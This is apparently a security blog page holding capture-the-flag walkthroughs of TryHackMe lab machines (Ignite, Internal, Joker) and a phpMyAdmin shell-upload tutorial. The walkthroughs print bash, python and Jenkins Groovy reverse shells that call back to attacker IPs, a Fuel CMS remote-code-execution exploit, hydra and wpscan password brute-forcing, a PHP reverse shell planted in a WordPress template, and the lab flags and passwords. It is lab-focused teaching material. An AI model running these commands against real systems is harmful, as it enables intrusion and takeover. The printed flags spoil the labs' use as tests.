Protected: htb-openkeys-nl

This content is password protected. To view it please enter your password below:

Posted on

Protected: htb-jewel-nl

This content is password protected. To view it please enter your password below:

Posted on

Protected: htb-reel2-nl

This content is password protected. To view it please enter your password below:

Posted on

Protected: htb-doctor-nl

This content is password protected. To view it please enter your password below:

Posted on

shell-uploading-web-server-phpmyadmin

In this tutorial, we will learn how to exploit a web server if we found the phpmyadmin panel has been left open. Here I will try to exploit phpmyadmin which is running inside the localhost “xampp” by generating a SQL query to execute malicious code and then make an effort to access the shell of victim’s Pc.

PhpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the Web. phpMyAdmin supports a wide range of operations on MySQL and MariaDB. Frequently used operations (managing databases, tables, columns, relations, indexes, users, permissions, etc) can be performed via the user interface, while you still have the ability to directly execute any SQL statement.

Features

  • Intuitive web interface
  • Support for most MySQL features:
  • browse and drop databases, tables, views, fields, and indexes
  • create, copy, drop, rename and alter databases, tables, fields, and indexes
  • maintenance server, databases, and tables, with proposals on server configuration
  • execute, edit and bookmark any SQL-statement, even batch-queries
  • manage MySQL user accounts and privileges
  • manage stored procedures and triggers
  • Import data from CSV and SQL
  • Export data to various formats: CSV, SQL, XML, PDF, ISO/IEC 26300 – OpenDocument Text and Spreadsheet, Word, LATEX, and others
  • Administering multiple servers
  • Creating graphics of your database layout in various formats
  • Creating complex queries using Query-by-example (QBE)
  • Searching globally in a database or a subset of it
  • Transforming stored data into any format using a set of predefined functions, like displaying BLOB-data as image or download-link

For information visit: https://www.phpmyadmin.net

Let’s start!!!

Open the localhost address:192.168.1.101:81 in the browser and select the option phpmyadmin from the given list of xampp as shown the following screenshot.

When you come into PhpMyAdmin application, here you will find different areas. On the left side of the screen, you can see the list of database names. As we are inside the administration console where we can perform multiple tasks which I have defined above, therefore, I am going to create a new database

Now click on new to create a database.

Give a name to your database as I have given Ignite technologies and click on create.

Now you can see the database ignite technologies has been added in the list of databases.

Click on ignite technologies database to construct an MYSQL query inside your database. Hence click on SQL tab where you can enter the SQL query code.

Click on ignite technologies database to construct an MYSQL query inside your database. Hence click on SQL tab where you can enter the SQL query code.

Now, this is an interesting part because here I am going to execute malicious code as SQL query which will create a command shell vulnerability inside the web server.

In the following screenshot, you can see I have given above malicious php code as SQL query and then click on GO tab to execute it.

Now type the following URL to find whether we are successful or not in order to create OS command shell vulnerability.

Awesome!!!  You can see it has given a warning which means we had successfully created OS command shell vulnerability.

When you execute the above URL in the browser you will get the information of victim‘s PC directories.

Next step will achieve a meterpreter session of victim’s Pc. Open another terminal in Kali Linux and type following command. msfconsole

Copy the selected part for the DLL file and use this malicious code as the command inside the URL.

Paste the above code the URL and execute it which will give a meterpreter session on Metasploit

From the following screenshot, you can see meterpreter session 1 opened.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets.

thm-ignite-nl

Description: A new start-up has a few issues with their web server.

Free room , Difficulty: Easy

https://tryhackme.com/room/ignite


Nmap

>:sudo nmap -sC -sV 'machine-ip'

This is the scan method I use most of the time. With -sC it loads some standard nmap scripts and with -sV it shows the version of every service located at the open ports. My results were:

Nmap scan result

Open port is 80 HTTP. The website itself contains a content management system (CMS) named fuel.

GoBuster

To further enumerate the machine I want to scan it for any, maybe some hidden, directories. For this I’m using GoBuster with the machine IP address and the wordlist with commonly used directory names:

>:gobuster dir -u http://'machine-ip' -w /usr/share/dirb/wordlists/common.txt

GoBuster scan result

A lot of directories! Went through all of there and one useful result was “/fuel” as we saw in the nikto scan result above and it turns out to be a login page.

Login page of fuelCMS

Because CMS tend to have a lot of weak points so let’s have a look, if there is an exploit for Fuel CMS on “exploit-db”.

Search result on exploit-db

One result with the number CVE-2018-16763 we’re able to use a Remote Code Execution against the CMS. I downloaded it and entered my own IP address. Then I marked it as executable and executed it. My output contained errors and mostly because of the proxy. To make the exploit work I had to comment out the proxy entries otherwise to get rid of the errors. Now the exploit script should look like this

https://github.com/puckiestyle/python/blob/master/fuelcms141rce.py

Entering the command whoami then got me the output www-data.

Command execution

Down are still some errors but we got our desired output on the top.

Privilege Escalation

Because I am now able to execute commands I entered the code for a reverse shell. But to catch any output we have to set up a netcat listener:

>:nc -lnvp 443

Now we can enter our reverse shell code(bash or python choose what ya like) .

>:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.3.122 443 >/tmp/f
>:python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.3.122",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

And then stabilized my current shell with:

>:python -c 'import pty; pty.spawn("/bin/bash")'

Note: I found out, that using the su command later on needs a terminal. So stabilizing the shell is very important to get to the solution.

Then I cat the “user.txt” file (*1). Searched for backups because those tend to contain valuable informations:

>:find / -type f -name "*.bak" 2>/dev/null

With the 2>/dev/null at the end I get rid of all the files I don’t have the permissions for it.

After looking around , I found the password for root: /var/www/html/fuel/application/config/database.php.

password

root: mememe

Okay so we just found the password for the root user and now we can change our account user to root using su command.

root-shell-1

After this you can just get the root flag from /root.

Summary

1. User.txt
– 6470e394cbf6dab6a91682cc8585059b

2. Root.txt
– b9bbcb33e11b80be759c4e844862482d

Author : Puckiestyle

thm-internal-nl

Internal

free room available at : https://tryhackme.com/room/internal

Penetration Testing Challenge

Having accepted the project, you are provided with the client assessment environment. Secure the User and Root flags and submit them to the dashboard as proof of exploitation.

You have been assigned to a client that wants a penetration test conducted on an environment due to be released to production in three weeks.

Scope of Work

The client requests that an engineer conducts an external, web app, and internal assessment of the provided virtual environment. The client has asked that minimal information be provided about the assessment, wanting the engagement conducted from the eyes of a malicious actor (black box penetration test). The client has asked that you secure two flags (no location provided) as proof of exploitation:

  • User.txt
  • Root.txt

Additionally, the client has provided the following scope allowances:

  • Ensure that you modify your hosts file to reflect internal.thm
  • Any tools or techniques are permitted in this engagement
  • Locate and note all vulnerabilities found
  • Submit the flags discovered to the dashboard
  • Only the IP address assigned to your machine is in scope

(Roleplay off)

I encourage you to approach this challenge as an actual penetration test. Consider writing a report, to include an executive summary, vulnerability and exploitation assessment, and remediation suggestions, as this will benefit you in preparation for the eLearnsecurity eCPPT or career as a penetration tester in the field.

Note – this room can be completed without Metasploit

User.txt Flag

Services enumeration

Let’s start to enumerate the services with Nmap. We discover 2 ports:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA)
|   256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA)
|_  256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web enumeration (gobuster)

There is no robots.txt file, but gobuster found a a blog, likely run with WordPress.

kali@kali:/data/The_Blob_Blog/files$ gobuster dir -u http://internal.thm -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://internal.thm
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/09/03 14:28:32 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/blog (Status: 301)
/index.html (Status: 200)
/javascript (Status: 301)
/phpmyadmin (Status: 301)
/server-status (Status: 403)
/wordpress (Status: 301)
===============================================================
2020/09/03 14:29:00 Finished
===============================================================

WordPress enumeration

Browsing /blog confirms our assumption, this is a WordPress blog. Let’s enumerate the users with wpscan:

kali@kali:/data/The_Blob_Blog/files$ wpscan --url http://internal.thm/blog -e u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.4
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://internal.thm/blog/ [10.10.137.187]
[+] Started: Thu Sep  3 14:36:16 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://internal.thm/blog/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://internal.thm/blog/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://internal.thm/blog/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.4.2 identified (Latest, released on 2020-06-10).
 | Found By: Rss Generator (Passive Detection)
 |  - http://internal.thm/blog/index.php/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
 |  - http://internal.thm/blog/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://internal.thm/blog/wp-content/themes/twentyseventeen/
 | Last Updated: 2020-08-11T00:00:00.000Z
 | Readme: http://internal.thm/blog/wp-content/themes/twentyseventeen/readme.txt
 | [!] The version is out of date, the latest version is 2.4
 | Style URL: http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css?ver=20190507
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 2.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 2.3'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=======================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://internal.thm/blog/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Thu Sep  3 14:36:20 2020
[+] Requests Done: 24
[+] Cached Requests: 34
[+] Data Sent: 5.936 KB
[+] Data Received: 181.104 KB
[+] Memory used: 172.43 MB
[+] Elapsed time: 00:00:03

According to WPScan, the only user is admin. Let’s try to brute force the password, using the bruteforce feature of WPScan:

kali@kali:/data/The_Blob_Blog/files$ wpscan --url http://internal.thm/blog -U admin -P /usr/share/wordlists/rockyou.txt 

[REDACTED]

[!] Valid Combinations Found:
 | Username: admin, Password: my2boys

[REDACTED]

WordPress admin connection

Login (http://internal.thm/blog/wp-admin/) is successful with admin:my2boys and we now have the ability to modify the templates PHP source code. This will be convenient to write a reverse shell.

In the web interface, go to “Appearance > Theme Editor > 404.php” and replace the PHP code with a PHP reverse shell (e.g. http://pentestmonkey.net/tools/web-shells/php-reverse-shell).

Open a listener (rlwrap nc -nlvp 4444) and call the template (http://internal.thm/blog/wp-content/themes/twentyseventeen/404.php).

Reverse shell

Now have a reverse shell:

$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.8.50.72] from (UNKNOWN) [10.10.137.187] 51322
Linux internal 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 12:46:33 up 23 min,  0 users,  load average: 0.02, 0.20, 0.18
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@internal:/$ whoami
whoami
www-data

Lateral move (www-data to aubreanna)

There is an interesting file in the /opt directory:

cat wp-save.txt
Bill,

Aubreanna needed these credentials for something later.  Let her know you have them and where they are.

aubreanna:bubb13guM!@#123

Let’s connect as aubreanna:

www-data@internal:/opt$ su aubreanna
su aubreanna
Password: bubb13guM!@#123

aubreanna@internal:/opt$ whoami
whoami
aubreanna

User flag

The user flag is in aubreanna’s home folder:

aubreanna@internal:/opt$ cd /home/aubreanna
cd /home/aubreanna
aubreanna@internal:~$ ls -la
ls -la
total 56
drwx------ 7 aubreanna aubreanna 4096 Aug  3 03:57 .
drwxr-xr-x 3 root      root      4096 Aug  3 01:40 ..
-rwx------ 1 aubreanna aubreanna    7 Aug  3 20:01 .bash_history
-rwx------ 1 aubreanna aubreanna  220 Apr  4  2018 .bash_logout
-rwx------ 1 aubreanna aubreanna 3771 Apr  4  2018 .bashrc
drwx------ 2 aubreanna aubreanna 4096 Aug  3 01:41 .cache
drwx------ 3 aubreanna aubreanna 4096 Aug  3 19:36 .gnupg
drwx------ 3 aubreanna aubreanna 4096 Aug  3 01:53 .local
-rwx------ 1 root      root       223 Aug  3 01:56 .mysql_history
-rwx------ 1 aubreanna aubreanna  807 Apr  4  2018 .profile
drwx------ 2 aubreanna aubreanna 4096 Aug  3 02:38 .ssh
-rwx------ 1 aubreanna aubreanna    0 Aug  3 01:41 .sudo_as_admin_successful
-rwx------ 1 aubreanna aubreanna   55 Aug  3 03:57 jenkins.txt
drwx------ 3 aubreanna aubreanna 4096 Aug  3 01:41 snap
-rwx------ 1 aubreanna aubreanna   21 Aug  3 03:56 user.txt
aubreanna@internal:~$ cat user.txt
cat user.txt
THM{int3rna1_fl4g_1}

User flag: THM{int3rna1_fl4g_1}

Root.txt Flag

Check privileges

To read the root flag, we will need a privilege escalation. Unfortunately, aubreanna is not in the sudoers.

aubreanna@internal:~$ sudo -l
Sorry, user aubreanna may not run sudo on internal.

Jenkins

There is an interesting file in aubreanna’s home folder that tells us Jenkins is running on port 8080:

aubreanna@internal:~$ cat jenkins.txt 
Internal Jenkins service is running on 172.17.0.2:8080

We confirm that the service is only available to localhost.

aubreanna@internal:~$ netstat -tan | grep 8080
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN

There are several indications that docker is available on the target, and as the Jenkins documentation (https://www.jenkins.io/doc/book/installing/) explains how to install Jenkins with docker, we can assume that this is how Jenkins has been installed. If not a rabbit hole, this could be a way to elevate our privileges to root. Worth trying…

To make Jenkins available to us (instead of just localhost), we can use a ssh tunnel.

┌─[user@parrot-virtual]─[/usr/bin]
└──╼ $ssh -L 8080:172.17.0.2:8080 aubreanna@10.10.227.191
The authenticity of host '10.10.227.191 (10.10.227.191)' can't be established.
ECDSA key fingerprint is SHA256:fJ/BlTrDF8wS8/eqyoej1aq/NmvQh79ABdkpiiN5tqE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.227.191' (ECDSA) to the list of known hosts.
aubreanna@10.10.227.191's password: bubb13guM!@#123
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Wed Sep 9 17:09:10 UTC 2020

System load: 0.01 Processes: 112
Usage of /: 63.7% of 8.79GB Users logged in: 0
Memory usage: 34% IP address for eth0: 10.10.227.191
Swap usage: 0% IP address for docker0: 172.17.0.1

=> There is 1 zombie process.


* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch

0 packages can be updated.
0 updates are security updates.


Last login: Mon Aug 3 19:56:19 2020 from 10.6.2.56
aubreanna@internal:~$ netstat -tan | grep 8080
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN 
aubreanna@internal:~$

We can then visit the Jenkins server web page by visiting from our parrot box 127.0.0.1:8080.

Jenkins’ admin password

Trying to authenticate as admin with admin or password as password fails. Let’s try to brute force the account.

To do that, intercept the POST request in Burp Suite to build our hydra attack.

POST /j_acegi_security_check HTTP/1.1
Host: internal.thm:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://internal.thm:8888/login?from=%2F
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
Connection: close
Cookie: JSESSIONID.fb3308f2=node0lfk0eau5l4zu17h43ifl0scpw36.node0
Upgrade-Insecure-Requests: 1

j_username=admin&j_password=admin&from=%2F&Submit=Sign+in

We now have all the required information. Here is the hydra attack:

┌─[user@parrot-virtual]─[~/ptd]
└──╼ $hydra -l admin -P /usr/share/wordlists/rockyou.txt localhost -s 8080 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password"
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-09 18:31:54
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://localhost:8080/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password
[8080][http-post-form] host: localhost login: admin password: spongebob
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-09 18:32:22
┌─[user@parrot-virtual]─[~/ptd]

We now have the admin’s password. Let’s connect to http://internal.thm:8888 with admin:spongebob.

Reverse shell in docker

Now that we have an admin access to Jenkins, we can run commands, and we’ll ultimately exploit this to have a reverse shell.

Start by running a listener (on your machine):

$ rlwrap nc -nlvp 5555

Now, in Jenkins, go to “Jenkins > Nodes > master” and click on “Script Console” from the menu. Execute the following command (found here):

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.8.50.72/5555;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Root password

In our listener, we now have a reverse shell. Browsing the file system reveals that the root password is disclosed in clear:

cd /opt
ls -la
total 12
drwxr-xr-x 1 root root 4096 Aug  3 03:31 .
drwxr-xr-x 1 root root 4096 Aug  3 03:07 ..
-rw-r--r-- 1 root root  204 Aug  3 03:31 note.txt
cat note.txt
Aubreanna,

Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here.  Use them if you 
need access to the root user account.

root:tr0ub13guM!@#123

Root flag

Back to our initial SSH connection as aubreanna:

aubreanna@internal:/var/backups$ su root
Password: 
root@internal:/var/backups# cd /root/
root@internal:~# ll
total 48
drwx------  7 root root 4096 Aug  3 13:16 ./
drwxr-xr-x 24 root root 4096 Aug  3 01:31 ../
-rw-------  1 root root  193 Aug  3 20:01 .bash_history
-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
drwx------  2 root root 4096 Aug  3 02:23 .cache/
drwx------  3 root root 4096 Aug  3 02:23 .gnupg/
drwxr-xr-x  3 root root 4096 Aug  3 01:53 .local/
-rw-------  1 root root 1071 Aug  3 13:16 .mysql_history
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwx------  2 root root 4096 Aug  3 01:40 .ssh/
-rw-r--r--  1 root root   22 Aug  3 04:13 root.txt
drwxr-xr-x  3 root root 4096 Aug  3 01:41 snap/
root@internal:~# cat root.txt 
THM{d0ck3r_d3str0y3r}

Root flag: THM{d0ck3r_d3str0y3r}

thm-jokerctf-nl

Batman hits Joker.

We have developed this lab for the purpose of online penetration practices. Solving this lab is not that tough if you have proper basic knowledge of Penetration testing. Let’s start and learn how to breach it.

  1. Enumerate Services
  • Nmap
  1. Bruteforce
  • Performing Bruteforce on files over http
  • Performing Bruteforce on Basic Authentication
  1. Hash Crack
  • Performing Bruteforce on hash to crack zip file
  • Performing Bruteforce on hash to crack mysql user
  1. Exploitation
  • Getting a reverse connection
  • Spawning a TTY Shell
  1. Privilege Escalation
  • Get root taking advantage of flaws in LXD

#1 – Enumerate services on target machine.

Hint: What about nmap?

Let’s start with a Nmap scan:

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ad:20:1f:f4:33:1b:00:70:b3:85:cb:87:00:c4:f4:f7 (RSA)
|   256 1b:f9:a8:ec:fd:35:ec:fb:04:d5:ee:2a:a1:7a:4f:78 (ECDSA)
|_  256 dc:d7:dd:6e:f6:71:1f:8c:2c:2c:a1:34:6d:29:99:20 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HA: Joker
8080/tcp open  http    Apache httpd 2.4.29
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Please enter the password.
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 401 Unauthorized
Service Info: Host: localhost; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap reveals 3 open ports on the server, 1 for SSH and 2 for HTTP.

#2 – What version of Apache is it?

Answer: 2.4.29

#3 – What port on this machine not need to be authenticated by user and password?

Only the HTTP service running on port 80 doesn’t require an authentication.

Answer: 80

#4 – There is a file on this port that seems to be secret, what is it?

Hint: Extensions File, dirb command comes with a flag that append each word with this extensions. Try to use dirb with a file that contains some commons extensions in a web server.

$ gobuster dir -u http://10.10.130.207 -w /data/src/wordlists/common.txt -x txt,php,html
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.130.207
[+] Threads:        10
[+] Wordlist:       /data/src/wordlists/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     txt,php,html
[+] Timeout:        10s
===============================================================
2020/06/22 23:31:44 Starting gobuster
===============================================================
/.hta (Status: 403)
/.hta.txt (Status: 403)
/.hta.php (Status: 403)
/.hta.html (Status: 403)
/.htaccess (Status: 403)
/.htaccess.txt (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.html (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.txt (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.html (Status: 403)
/css (Status: 301)
/img (Status: 301)
/index.html (Status: 200)
/index.html (Status: 200)
/phpinfo.php (Status: 200)
/phpinfo.php (Status: 200)
/secret.txt (Status: 200)
/server-status (Status: 403)
===============================================================
2020/06/22 23:33:12 Finished
===============================================================

Answer: secret.txt

#5 – There is another file which reveals information of the backend, what is it?

Answer: phpinfo.php

#6 – When reading the secret file, We find with a conversation that seems contains at least two users and some keywords that can be intersting, what user do you think it is?

$ curl -s http://10.10.130.207/secret.txt
Batman hits Joker.
Joker: "Bats you may be a rock but you won't break me." (Laughs!)
Batman: "I will break you with this rock. You made a mistake now."
Joker: "This is one of your 100 poor jokes, when will you get a sense of humor bats! You are dumb as a rock."
Joker: "HA! HA! HA! HA! HA! HA! HA! HA! HA! HA! HA! HA!"

Answer: joker

#7 – What port on this machine need to be authenticated by Basic Authentication Mechanism?

$ curl -i http://10.10.130.207:8080
HTTP/1.1 401 Unauthorized
Date: Tue, 23 Jun 2020 06:46:52 GMT
Server: Apache/2.4.29 (Ubuntu)
WWW-Authenticate: Basic realm=" Please enter the password."
Content-Length: 461
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>401 Unauthorized</title>
</head><body>
<h1>Unauthorized</h1>
<p>This server could not verify that you
are authorized to access the document
requested.  Either you supplied the wrong
credentials (e.g., bad password), or your
browser doesn't understand how to supply
the credentials required.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 10.10.130.207 Port 8080</address>
</body></html>

Answer: 8080

#8 – At this point we have one user and a url that needs to be aunthenticated, brute force it to get the password, what is that password?

Hint: Maybe burp with format user:pass and encode with base64? Note: Don’t forget decode it!!

Let’s brute force joker’s password with Hydra:

$ hydra -l joker -P /data/src/wordlists/rockyou.txt -s 8080 10.10.130.207 http-get
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-06-23 09:07:05
[WARNING] You must supply the web page as an additional option or via -m, default path set to /
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking http-get://10.10.130.207:8080/
[8080][http-get] host: 10.10.130.207   login: joker   password: hannah
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-06-23 09:07:32

Answer: hannah

#9 – Yeah!! We got the user and password and we see a cms based blog. Now check for directories and files in this port. What directory looks like as admin directory?

Hint: Nikto with the credentials we obtained?

The application hosted on port 8080 seems to be a Joomla CMS.

There is a robots.txt file (http://10.10.130.207:8080/robots.txt) that discloses several locations, one of which (/administrator/) being particularly interesting:

$ curl -s -H "Authorization: Basic am9rZXI6aGFubmFo" http://10.10.130.207:8080/robots.txt
# If the Joomla site is installed within a folder 
# eg www.example.com/joomla/ then the robots.txt file 
# MUST be moved to the site root 
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths. 
# eg the Disallow rule for the /administrator/ folder MUST 
# be changed to read 
# Disallow: /joomla/administrator/
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/orig.html
#
# For syntax checking, see:
# http://tool.motoricerca.info/robots-checker.phtml

User-agent: *
Disallow: /administrator/
Disallow: /bin/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /layouts/
Disallow: /libraries/
Disallow: /logs/
Disallow: /modules/
Disallow: /plugins/
Disallow: /tmp/

Answer: /administrator/

#10 – We need access to the administration of the site in order to get a shell, there is a backup file, What is this file?

Let’s search for some common extensions for backups:

$ gobuster dir -U joker -P hannah -u http://10.10.130.207:8080/ -x bak,old,tar,gz,tgz,zip,7z -w /data/src/wordlists/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.130.207:8080/
[+] Threads:        10
[+] Wordlist:       /data/src/wordlists/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Auth User:      joker
[+] Extensions:     bak,old,tar,gz,tgz,zip,7z
[+] Timeout:        10s
===============================================================
2020/06/23 09:33:15 Starting gobuster
===============================================================
/.hta (Status: 403)
/.hta.bak (Status: 403)
/.hta.old (Status: 403)
/.hta.tar (Status: 403)
/.hta.gz (Status: 403)
/.hta.tgz (Status: 403)
/.hta.zip (Status: 403)
/.hta.7z (Status: 403)
/.htaccess (Status: 403)
/.htaccess.zip (Status: 403)
/.htaccess.7z (Status: 403)
/.htaccess.bak (Status: 403)
/.htaccess.old (Status: 403)
/.htaccess.tar (Status: 403)
/.htaccess.gz (Status: 403)
/.htaccess.tgz (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.gz (Status: 403)
/.htpasswd.tgz (Status: 403)
/.htpasswd.zip (Status: 403)
/.htpasswd.7z (Status: 403)
/.htpasswd.bak (Status: 403)
/.htpasswd.old (Status: 403)
/.htpasswd.tar (Status: 403)
/administrator (Status: 301)
/bin (Status: 301)
/backup (Status: 200)
/backup.zip (Status: 200)
/cache (Status: 301)

[REDACTED]

Answer: backup.zip

#11 – We have the backup file and now we should look for some information, for example database, configuration files, etc … But the backup file seems to be encrypted. What is the password?

Hint: Use john to crack the zip hash

We download the backup file and try to uncompress it, but it requires a password:

$ wget --user=joker --password=hannah http://10.10.130.207:8080/backup.zip
$ unzip backup.zip 
Archive:  backup.zip
   creating: db/
[backup.zip] db/joomladb.sql password:

Let’s crack the password:

$ zip2john backup.zip > backup.hash
$ john backup.hash
